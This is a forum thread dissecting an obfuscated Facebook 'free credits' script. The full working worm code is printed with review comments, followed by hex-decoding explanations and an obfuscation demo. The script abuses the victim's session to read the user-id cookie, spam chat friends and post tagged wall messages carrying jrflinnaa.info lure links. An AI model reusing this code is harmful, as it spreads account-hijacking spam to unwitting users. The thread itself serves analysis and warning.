
What Does This Javascript Code Do?


555


I was surfing Facebook and found this thing saying how to get 500 free FB credits. I figured it sounded funny, so I looked at the source code, but I have no idea how to decipher it or what it is saying on the last line. How do I decode it, and what is this code doing?

// NOTE(review): this is the obfuscated Facebook "500 free credits" script the
// thread is discussing, kept byte-for-byte for analysis.  The string table
// `_0xb65c` decodes to the list given further down the thread: property and
// method names ("open", "send", "responseText", "cookie", "match", ...) plus
// the relative Facebook endpoints /ajax/chat/buddy_list.php,
// /ajax/chat/send.php, /ajax/browser/friends/, /ajax/updatestatus.php and
// /mobile/?v=photos.  Read with that table, the code does the following when
// it runs inside a logged-in Facebook page (every request is a same-origin
// XMLHttpRequest, so it rides the victim's own session cookies; as the thread
// notes, the entry vector is the victim pasting it into their own browser):
//   1. GET "/" and, on success, read the logged-in user id from
//      document.cookie (regex /c_user=(\d+)/) and a composer_id from the
//      returned HTML.
//   2. POST to the buddy-list endpoint, eval() the reply after dropping its
//      first 9 characters (presumably an anti-JSON-hijacking prefix -- not
//      verifiable from this snippet), and POST `chatmessage` to every id in
//      payload.buddy_list.nowAvailableList.  Nothing in the snippet ever
//      substitutes the "%firstname%" placeholder, so it would be sent literally.
//   3. GET the friends page, scrape id/name pairs out of it with regexes,
//      pick 3 at random and substitute them for "%tf1%".."%tf3%" in
//      `postmessage` (plain names in message_text, "@[id:name]" tag syntax
//      in message), then POST the result to the status-update endpoint.
//      Note the template below only contains the unnumbered token "%tf%",
//      which the replace() calls do not match, so the wall post would go out
//      with the placeholders unreplaced.
//   4. GET /mobile/?v=photos and alert() the first match of an
//      "EmailIframe" div in the response.
// The two alert() calls ("post returned ...", "match: ...") are the only
// visible output.  Indicators useful for blocking or hunting are the three
// jrflinnaa.info / jrflinna.info URLs in the three string literals below and
// the eval() of a server response inside the buddy-list callback.
var chatmessage = "Hey %firstname% have you heard about the facebook glitch you can get 500 facebook credits check it out. cvb.jrflinnaa.info/?40lyjl9";
  var postmessage = "%tf% %tf% %tf% %tf% %tf% %tf%\ndid you guys hear about the facebook glitch you can get 500 facebook credits ?check it out http://sdf.jrflinnaa.info/?zpzx6fb\n";
  // `redirect` is declared but never referenced anywhere in this snippet.
  var redirect = "http://jrflinna.info/final.php";
  // Obfuscation string table; every property access and URL below is an
  // index into it (decoded list: see the reply later in the thread).
  var _0xb65c=["\x47\x45\x54","\x2F","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x40\x5B","\x69\x64","\x3A","\x6E\x61\x6D\x65","\x5D","","\x26","\x3D","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x50\x4F\x53\x54","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x73\x75\x62\x73\x74\x72","\x28","\x29","\x62\x75\x64\x64\x79\x5F\x6C\x69\x73\x74","\x70\x61\x79\x6C\x6F\x61\x64","\x6E\x6F\x77\x41\x76\x61\x69\x6C\x61\x62\x6C\x65\x4C\x69\x73\x74","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x67\x65\x74\x54\x69\x6D\x65","\x2F\x61\x6A\x61\x78\x2F\x63\x68\x61\x74\x2F\x73\x65\x6E\x64\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x70\x6F\x73\x74\x20\x72\x65\x74\x75\x72\x6E\x65\x64\x20","\x41\x73\x79\x6E\x63\x52\x65\x71\x75\x65\x73\x74","\x73\x65\x6E\x64","\x2F\x61\x6A\x61\x78\x2F\x62\x72\x6F\x77\x73\x65\x72\x2F\x66\x72\x69\x65\x6E\x64\x73\x2F\x3F\x75\x69\x64\x3D","\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x3D\x31","\x6C\x65\x6E\x67\x74\x68","\x72\x65\x70\x6C\x61\x63\x65","\x70\x75\x73\x68","\x73\x68\x69\x66\x74","\x68\x6F\x6D\x65","\x25\x74\x66","\x25","\x6D\x65\x73\x73\x61\x67\x65\x5F\x74\x65\x78\x74","\x6D\x65\x73\x73\x61\x67\x65","\x2F\x61\x6A\x61\x78\x2F\x75\x70\x64\x61\x74\x65\x73\x74\x61\x74\x75\x73\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x2F\x6D\x6F\x62\x69\x6C\x65\x2F\x3F\x76\x3D\x70\x68\x6F\x74\x6F\x73","\x58\x2D\x52\x65\x71\x75\x65\x73\x74\x65\x64\x2D\x57\x69\x74\x68","\x58\x2D\x52\x65\x71\x75\x65\x73\x74\x65\x64","\x6D\x61\x74\x63\x68\x3A\x20"];x1= new 
XMLHttpRequest();x1[_0xb65c[2]](_0xb65c[0],_0xb65c[1]);x1[_0xb65c[3]]=function (){if(x1[_0xb65c[4]]==4&&x1[_0xb65c[5]]==200){var _0xc3adx1=document[_0xb65c[7]][_0xb65c[6]](/c_user=(\d+)/)[1];var _0xc3adx2=3;var _0xc3adx3=function (_0xc3adx4){if(_0xc3adx4){return _0xb65c[8]+_0xc3adx4[_0xb65c[9]]+_0xb65c[10]+_0xc3adx4[_0xb65c[11]]+_0xb65c[12];} ;return _0xb65c[13];} ;var _0xc3adx5=function (_0xc3adx4){if(_0xc3adx4){return _0xc3adx4[_0xb65c[11]];} ;return _0xb65c[13];} ;var _0xc3adx6=function (_0xc3adx4){out=_0xb65c[13];for(var _0xc3adx7 in _0xc3adx4){out+=(out?_0xb65c[14]:_0xb65c[13])+_0xc3adx7+((_0xc3adx4[_0xc3adx7]!==null)?_0xb65c[15]+encodeURIComponent(_0xc3adx4[_0xc3adx7]):_0xb65c[13]);} ;return out;} ;var _0xc3adx8=(z=x1[_0xb65c[16]])[_0xb65c[6]](/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];if(true){var _0xc3adx9= new XMLHttpRequest();_0xc3adx9[_0xb65c[2]](_0xb65c[17],_0xb65c[18]);_0xc3adx9[_0xb65c[21]](_0xb65c[19],_0xb65c[20]);_0xc3adx9[_0xb65c[3]]=function (){if(_0xc3adx9[_0xb65c[4]]==4&&_0xc3adx9[_0xb65c[5]]==200){var _0xc3adxa=_0xc3adx9[_0xb65c[16]][_0xb65c[22]](9);var _0xc3adxb=eval(_0xb65c[23]+_0xc3adxa+_0xb65c[24]);var _0xc3adxc=_0xc3adxb[_0xb65c[26]][_0xb65c[25]];for(var _0xc3adxd in _0xc3adxc[_0xb65c[27]]){var _0xc3adxe=Math[_0xb65c[29]](Math[_0xb65c[28]]());var _0xc3adxf=( new Date())[_0xb65c[30]]();var _0xc3adx10=chatmessage;x5= new XMLHttpRequest();x5[_0xb65c[2]](_0xb65c[17],_0xb65c[31]);if(true){x5[_0xb65c[3]]=function (){if(x5[_0xb65c[4]]==4&&x5[_0xb65c[5]]==200){alert(_0xb65c[32]+_0xc3adx9[_0xb65c[16]]);} ;} ;} ;x5[_0xb65c[34]](_0xc3adx6({msg_id:_0xc3adxe,client_time:_0xc3adxf,to:_0xc3adxd,msg_text:_0xc3adx10,post_form_id_source:_0xb65c[33]}));} ;} ;} ;_0xc3adx9[_0xb65c[34]](_0xc3adx6({user:_0xc3adx1,lsd:null,post_form_id_source:_0xb65c[33],popped_out:false,force_render:true}));} ;if(true){var _0xc3adx11= new XMLHttpRequest();_0xc3adx11[_0xb65c[2]](_0xb65c[0],_0xb65c[35]+_0xc3adx1+_0xb65c[36]);_0xc3adx11[_0xb65c[3]]=function 
(){if(_0xc3adx11[_0xb65c[4]]==4&&_0xc3adx11[_0xb65c[5]]==200){var _0xc3adx12=_0xc3adx11[_0xb65c[16]][_0xb65c[6]](/\/\d+#\d+#\d+#q\.jpg.*?\\u003c\\\/>/gi);var _0xc3adx10=[];for(var _0xc3adx13=0;_0xc3adx13<_0xc3adx12[_0xb65c[37]];_0xc3adx13++){var _0xc3adx14=_0xc3adx12[_0xc3adx13][_0xb65c[6]](/#\d+#/)[0][_0xb65c[38]](/#/g,_0xb65c[13]);var _0xc3adx15=_0xc3adx12[_0xc3adx13][_0xb65c[6]](/>[^>]+\\u003c\\\/>$/i)[0][_0xb65c[38]](/\\u003c\\\/>$/gim,_0xb65c[13])[_0xb65c[38]](/>/g,_0xb65c[13]);_0xc3adx10[_0xb65c[39]]({id:_0xc3adx14,name:_0xc3adx15});} ;var _0xc3adx16=[];while(_0xc3adx16[_0xb65c[37]]<_0xc3adx2&&_0xc3adx10[_0xb65c[37]]){var _0xc3adx17=Math[_0xb65c[29]](Math[_0xb65c[28]]()*_0xc3adx10[_0xb65c[37]]);_0xc3adx16[_0xb65c[39]](_0xc3adx10[_0xc3adx17]);var _0xc3adxf=_0xc3adx10[_0xb65c[40]]();if(_0xc3adx17){_0xc3adx10[_0xc3adx17]=_0xc3adxf;} ;} ;var _0xc3adx18={composer_id:_0xc3adx8,context:_0xb65c[41],fbx:_0xb65c[13],lsd:null,post_form_id_source:_0xb65c[33]};mt=postmessage;_0xc3adx10=postmessage;for(var _0xc3adx13=1;_0xc3adx13<=_0xc3adx2;_0xc3adx13++){mt=mt[_0xb65c[38]](_0xb65c[42]+_0xc3adx13+_0xb65c[43],_0xc3adx5(_0xc3adx16[_0xc3adx13-1]));_0xc3adx10=_0xc3adx10[_0xb65c[38]](_0xb65c[42]+_0xc3adx13+_0xb65c[43],_0xc3adx3(_0xc3adx16[_0xc3adx13-1]));} ;_0xc3adx18[_0xb65c[44]]=mt;_0xc3adx18[_0xb65c[45]]=_0xc3adx10;x6= new XMLHttpRequest();x6[_0xb65c[2]](_0xb65c[17],_0xb65c[46]);x6[_0xb65c[34]](_0xc3adx6(_0xc3adx18));} ;} ;_0xc3adx11[_0xb65c[34]](null);} ;if(true){x4= new XMLHttpRequest();x4[_0xb65c[2]](_0xb65c[0],_0xb65c[47]);x4[_0xb65c[21]](_0xb65c[48],null);x4[_0xb65c[21]](_0xb65c[49],null);x4[_0xb65c[3]]=function (){if(x4[_0xb65c[4]]==4&&x4[_0xb65c[5]]==200){m=x4[_0xb65c[16]][_0xb65c[6]](/<div class="EmailIframe"><iframe src="[^\"]+.*<div>.*<\/div>"/)[0];alert(_0xb65c[50]+m);} ;} ;x4[_0xb65c[34]](null);} ;} ;} ;x1[_0xb65c[34]](null);

what exactly is all the stuff like "\x3D","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78"?


All the \x69 stuff is hex-escaped text used to obfuscate the code, much like encoded shellcode is used to hide what it really says.

Looks like some XSS attack for Facebook. Don't paste the output it asks you to into the browser. There used to be an old hack to view people's walls, pics etc. that used similar techniques, but this is definitely not something you want to run.

URL for the code I found at - http://sdf.jrflinnaa.info/e.js

Someone had tweeted about a new Facebook XSS attack the other day, I assume this is it. This also looks like it takes advantage of the recent Adobe Flash attack, which is patched in the recent Flash update.

Edited by digip

All the \x69 stuff is obfuscated hex code, almost like shell code attacks to try and hide what it really says.

Looks like some XSS attack for Facebook. Don't paste the output it asks you to in the browser. There used to be an old hack to view peoples wall, pics etc, that used similar techniques, but this is definitely not good to run.

URL for the code I found at - http://sdf.jrflinnaa.info/e.js

Someone had tweeted about a new Facebook XSS attack the other day, I assume this is it. This also looks like it takes advantage of the recent Adobe Flash attack, which is patched in the recent Flash update.

Yeah, that was the link. How can I de-obfuscate it to view what it says? So it is shellcode? How does the browser even recognize the hex code if it is encrypted/obfuscated? How do I create my own code like that? lol, sorry for the thousand questions.


Hex escape sequences in a JavaScript string are decoded to plain text automatically when the script runs, but there are a number of ways to obfuscate code. I'm not too great at obfuscating stuff, but usually you write the output to an alert to see the result instead of letting it run normally. I often put the output into a text box, so if it has another script inside of a script, it doesn't run.

I wrote a little piece on this a few years ago, but something like the code you have above requires several pieces of the puzzle to get the output. By itself you would have to decode the hex manually or write something to dump it, since it's a set of variables and not a function in itself you can dump output from. Some scripts call multiple pieces to encode other bits of the scripts, making it harder to decode them since it isn't all in one function or URL location. They could break the code up into multiple scripts across several domains, which makes it even harder to block, since the malicious code isn't in one script but in many, making the individual parts look benign.

Here is an example of how to decode very basic scripts so you can get an idea: http://www.twistedpairrecords.com/blog/2009/04/02/debugging-spam-code/

The first long hex string is

GET/openonreadystatechangereadyStatestatusmatchcookie@[id:name]&=responseTextPOST/ajax/chat/buddy_list.php?__a=1Content-Typeapplication/x-www-form-urlencodedsetRequestHeadersubstr()buddy_listpayloadnowAvailableListrandomfloorgetTime/ajax/chat/send.php?__a=1post returned AsyncRequestsend/ajax/browser/friends/?uid=&__a=1&__d=1lengthreplacepushshifthome%tf%message_textmessage/ajax/updatestatus.php?__a=1/mobile/?v=photosX-Requested-WithX-Requestedmatch: 

Edited by digip

Here is a simple example of a "hello world" but obfuscated with hex code.

&lt;html&gt;
&lt;head&gt;

&lt;script type="text/javascript"&gt;
// Demonstration of hex-escape obfuscation.  The string literal below is
//   <script>document.write("hello world");</script>
// written entirely as \xNN escapes; the JavaScript engine decodes the escapes
// when it parses the literal, so document.write() receives the plain markup.
function poop(){

	document.write("\x3C\x73\x63\x72\x69\x70\x74\x3E\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x22\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64\x22\x29\x3B\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");
	}


&lt;/script&gt;

&lt;/head&gt;
&lt;body &gt;
\x3C\x73\x63\x72\x69\x70\x74\x3E\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x22\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64\x22\x29\x3B\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E = &lt;script&gt;poop();&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;


humm.. so I used the leetkey plugin to hex encode the first part of the code and got this "5c 78 33 43 5c 78 37 33 5c 78 36 33 5c 78 37 32 5c 78 36 39 5c 78 37 30 5c 78 37 34 5c 78 33 45 5c 78 36 34 5c 78 36 46 5c 78 36 33 5c 78 37 35 5c 78 36 44 5c 78 36 35 5c " which looks like normal hex. Using asciitable.com to view the first hex, it says "nothing for 5c, which is probably the \, hex#78=x, hex#33=3, hex#43=+, hex#5c again, hex#78=x, hex#37=7, hex#..." I dunno, I think I am way off LOL. I will read the link you provided, thanks. Isn't there any kind of Firefox plugin to auto encode and decode that stuff? I guess things I do not know about yet I find interesting.

btw:Checked out that link but got a virus/xss/whatever warning

Edited by 555

humm.. so I used the leetkey plugin to hex encode the first part of the code and got this "5c 78 33 43 5c 78 37 33 5c 78 36 33 5c 78 37 32 5c 78 36 39 5c 78 37 30 5c 78 37 34 5c 78 33 45 5c 78 36 34 5c 78 36 46 5c 78 36 33 5c 78 37 35 5c 78 36 44 5c 78 36 35 5c " which looks like normal hex. Using asciitable.com to view the first hex, it says "nothing for 5c, which is probably the \, hex#78=x, hex#33=3, hex#43=+, hex#5c again, hex#78=x, hex#37=7, hex#..." I dunno, I think I am way off LOL. I will read the link you provided, thanks. Isn't there any kind of Firefox plugin to auto encode and decode that stuff? I guess things I do not know about yet I find interesting.

btw:Checked out that link but got a virus/xss/whatever warning

For which link? The twistedpairrecords one? That's my site. I can assure you there is no exploit code; your anti-virus is just overactive and is scanning the code I have in the page, which is not able to run natively since it's just dumped to a text box. It must be looking at the plain text itself as executable code, or doing a heuristic scan, but it is a complete false positive.


Came across this JavaScript Obfuscator website.

http://www.javascriptobfuscator.com/



Remove the \x, and convert the " and , characters to their hex values (22 and 2C); you get:

47 45 54 22 2C 22 2F 22 2C 22 6F 70 65 6E 22 2C 22 6F 6E 72 65 61 64 79 73 74 61 74 65 63 68 61 6E 67 65 22 2C 22 72 65 61 64 79 53 74 61 74 65 22 2C 22 73 74 61 74 75 73 22 2C 22 6D 61 74 63 68 22 2C 22 63 6F 6F 6B 69 65 22 2C 22 40 5B 22 2C 22 69 64 22 2C 22 3A 22 2C 22 6E 61 6D 65 22 2C 22 5D 22 2C 22 22 2C 22 26 22 2C 22 3D 22 2C 22 72 65 73 70 6F 6E 73 65 54 65 78 74 22 2C 22 50 4F 53 54 22 2C 22 2F 61 6A 61 78 2F 63 68 61 74 2F 62 75 64 64 79 5F 6C 69 73 74 2E 70 68 70 3F 5F 5F 61 3D 31 22 2C 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 2C 22 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66 6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 22 2C 22 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 22 2C 22 73 75 62 73 74 72 22 2C 22 28 22 2C 22 29 22 2C 22 62 75 64 64 79 5F 6C 69 73 74 22 2C 22 70 61 79 6C 6F 61 64 22 2C 22 6E 6F 77 41 76 61 69 6C 61 62 6C 65 4C 69 73 74 22 2C 22 72 61 6E 64 6F 6D 22 2C 22 66 6C 6F 6F 72 22 2C 22 67 65 74 54 69 6D 65 22 2C 22 2F 61 6A 61 78 2F 63 68 61 74 2F 73 65 6E 64 2E 70 68 70 3F 5F 5F 61 3D 31 22 2C 22 70 6F 73 74 20 72 65 74 75 72 6E 65 64 20 22 2C 22 41 73 79 6E 63 52 65 71 75 65 73 74 22 2C 22 73 65 6E 64 22 2C 22 2F 61 6A 61 78 2F 62 72 6F 77 73 65 72 2F 66 72 69 65 6E 64 73 2F 3F 75 69 64 3D 22 2C 22 26 5F 5F 61 3D 31 26 5F 5F 64 3D 31 22 2C 22 6C 65 6E 67 74 68 22 2C 22 72 65 70 6C 61 63 65 22 2C 22 70 75 73 68 22 2C 22 73 68 69 66 74 22 2C 22 68 6F 6D 65 22 2C 22 25 74 66 22 2C 22 25 22 2C 22 6D 65 73 73 61 67 65 5F 74 65 78 74 22 2C 22 6D 65 73 73 61 67 65 22 2C 22 2F 61 6A 61 78 2F 75 70 64 61 74 65 73 74 61 74 75 73 2E 70 68 70 3F 5F 5F 61 3D 31 22 2C 22 2F 6D 6F 62 69 6C 65 2F 3F 76 3D 70 68 6F 74 6F 73 22 2C 22 58 2D 52 65 71 75 65 73 74 65 64 2D 57 69 74 68 22 2C 22 58 2D 52 65 71 75 65 73 74 65 64 22 2C 22 6D 61 74 63 68 3A 20 22

Using the Hex to ASCII converter ( http://www.yellowpipe.com/yis/tools/encrypter/index.php ) the above converts to:

GET","/","open","onreadystatechange","readyState","status","match","cookie","@[","id",":","name","]","","&","=","responseText","POST","/ajax/chat/buddy_list.php?__a=1","Content-Type","application/x-www-form-urlencoded","setRequestHeader","substr","(",")","buddy_list","payload","nowAvailableList","random","floor","getTime","/ajax/chat/send.php?__a=1","post returned ","AsyncRequest","send","/ajax/browser/friends/?uid=","&__a=1&__d=1","length","replace","push","shift","home","%tf","%","message_text","message","/ajax/updatestatus.php?__a=1","/mobile/?v=photos","X-Requested-With","X-Requested","match: "

From there, I searched Google and found this page, which appears to have the entire code (the above is at line 24):

http://pastebin.com/tY6wqti2

